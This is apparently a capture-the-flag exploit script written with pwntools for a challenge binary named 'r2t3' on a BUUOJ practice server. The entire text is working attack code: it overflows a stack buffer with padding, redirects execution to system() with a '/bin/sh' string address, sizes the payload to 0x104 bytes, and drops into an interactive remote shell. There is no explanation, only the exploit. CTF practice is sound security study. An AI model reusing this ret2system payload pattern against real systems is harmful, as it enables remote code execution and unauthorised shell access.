exp
from pwn import *
context.log_level = 'debug'
proc_name = './r2t3'
#
sh = remote('node3.buuoj.cn', 28627)
# sh = process(proc_name)
elf = ELF(proc_name)
system_addr = elf.plt['system']
main_addr = elf.sym['main']
bin_sh_addr = 0x08048760
# n = 0x104
payload = 'a'.encode() * (0x11 + 4) + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr) + 'a'.encode() * (0x104 - 0x21)
sh.sendline(payload)
sh.interactive()